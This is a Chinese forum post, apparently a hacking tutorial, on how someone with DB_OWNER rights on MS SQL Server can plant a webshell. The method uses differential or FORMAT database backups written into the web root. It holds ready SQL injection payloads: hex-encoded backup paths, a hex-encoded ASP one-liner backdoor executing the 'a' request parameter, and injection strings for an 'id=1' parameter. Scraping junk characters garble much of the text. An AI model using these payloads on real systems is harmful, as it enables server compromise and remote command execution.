DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

& `6 e# {- j: Q! u* _3 j; |4 T; |减少备份文件大小，得到可执行的webshell成功率提高不少
一利用差异备份
加一个参数WITH DIFFERENTIAL
% E2 o, |. Y; E7 C
# @1 X; K2 [% A/ H  I8 U, K1
% _( `* W3 F3 P3 q9 h/ w7 b! F2
3
/ p( W+ Y0 ^- @+ Y1 B4
  g, N. w) \. [. G1 S$ ?) M declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
# k) k# c! _. ~6 y0 Kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

6 Z. }5 O# G) g3 {二利用完全FORMAT
加一个参数WITH FROMAT
5 a4 q, R" B& A( }9 M+ r/ F; _  C+ p% Y有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
2 z2 h- w' I' {
1
; Q! t% P) z4 n  ?5 W  S& m( N2
/ {. E, U7 S# O8 U& o9 m3
. V' j7 ~5 I, g; d4
* G/ I- U3 n' A declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
1 b: P+ v$ c* g$ Z( k' C, X
3 ?, z$ l! X0 Z* ]总的来说就是那么简单几句,下面以备份数据库model为例子
1 @+ J9 }% X3 Y1
" ~" F* ^; K/ Y  U8 q
& N1 H! X- o: P; d# B1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

2
" m* b  Z( `, O+ |, }3 x2 Y7 O; u; A
1
( {7 {& y3 R5 ~" x9 T" X( O id=1;backup database model to disk='你的路径‘ with differential,format;--
+ E  j) ~* Z: W5 b7 w